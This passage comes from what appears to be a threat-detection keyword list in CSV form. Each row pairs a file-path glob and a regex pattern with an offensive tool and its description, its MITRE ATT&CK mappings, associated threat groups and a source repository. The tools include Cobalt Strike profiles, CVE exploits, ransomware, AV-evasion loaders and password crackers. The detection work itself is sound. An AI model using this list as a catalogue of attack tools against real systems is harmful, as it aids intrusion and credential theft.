CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","8","786","142","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z" "*/jaff.profile*",".{0,1000}\/jaff\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/jas502n/CVE-2020-5902*",".{0,1000}\/jas502n\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*/jasmin-ransomware.git*",".{0,1000}\/jasmin\-ransomware\.git.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*/jasperloader.profile*",".{0,1000}\/jasperloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/java/jndi/RMIRefServer.java*",".{0,1000}\/java\/jndi\/RMIRefServer\.java.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2471","712","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" "*/jdwp-exec.nse*",".{0,1000}\/jdwp\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jdwp-info.nse*",".{0,1000}\/jdwp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jdwp-inject.nse*",".{0,1000}\/jdwp\-inject\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jdwp-version.nse*",".{0,1000}\/jdwp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jiansiting/CVE-2020-5902*",".{0,1000}\/jiansiting\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","1","6","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z" "*/Jira-Lens.git*",".{0,1000}\/Jira\-Lens\.git.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","269","38","2024-02-05T10:24:00Z","2021-11-14T18:37:47Z" "*/Jira-Lens/*",".{0,1000}\/Jira\-Lens\/.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","269","38","2024-02-05T10:24:00Z","2021-11-14T18:37:47Z" "*/JoelGMSec/PyShell*",".{0,1000}\/JoelGMSec\/PyShell.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/john -*",".{0,1000}\/john\s\-.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/john.git*",".{0,1000}\/john\.git.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*/john/run/*.pl*",".{0,1000}\/john\/run\/.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/john/run/*.py*",".{0,1000}\/john\/run\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/john_the_ripper_cracker.py*",".{0,1000}\/john_the_ripper_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/JohnTheRipper*",".{0,1000}\/JohnTheRipper.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/Jomungand.git*",".{0,1000}\/Jomungand\.git.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*/Jormungand.sln*",".{0,1000}\/Jormungand\.sln.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*/Jormungandr.git*",".{0,1000}\/Jormungandr\.git.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*/js_inject.txt*",".{0,1000}\/js_inject\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/juicypotato*",".{0,1000}\/juicypotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/JuicyPotatoNG.git*",".{0,1000}\/JuicyPotatoNG\.git.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*/Jump-exec/Psexec*",".{0,1000}\/Jump\-exec\/Psexec.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/JumpSession.cna*",".{0,1000}\/JumpSession\.cna.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "*/JumpSession_BOF.git*",".{0,1000}\/JumpSession_BOF\.git.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "*/K8_CS_*_*.rar*",".{0,1000}\/K8_CS_.{0,1000}_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/k8gege/*",".{0,1000}\/k8gege\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/k8gege/scrun/*",".{0,1000}\/k8gege\/scrun\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*/k8gege520*",".{0,1000}\/k8gege520.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/ka7ana/CVE*.ps1*",".{0,1000}\/ka7ana\/CVE.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poc","Simple PoC in PowerShell for CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tools","https://github.com/ka7ana/CVE-2023-23397","1","1","N/A","N/A","1","41","11","2023-03-16T19:29:49Z","2023-03-16T19:10:37Z" "*/kali/pool/main/*",".{0,1000}\/kali\/pool\/main\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/kali-linux-2023*",".{0,1000}\/kali\-linux\-2023.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/kali-tools-*",".{0,1000}\/kali\-tools\-.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/katoolin3*",".{0,1000}\/katoolin3.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*/KaynLdr.git*",".{0,1000}\/KaynLdr\.git.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*/KaynStrike.cna*",".{0,1000}\/KaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*/KaynStrike.git*",".{0,1000}\/KaynStrike\.git.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*/KCMTicketFormatter*",".{0,1000}\/KCMTicketFormatter.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","N/A","7","1","36","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z" "*/kdstab.*",".{0,1000}\/kdstab\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/KDStab.*",".{0,1000}\/KDStab\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/KDStab/*",".{0,1000}\/KDStab\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/keepass_discover.py*",".{0,1000}\/keepass_discover\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/keepass_discover_*.txt*",".{0,1000}\/keepass_discover_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" 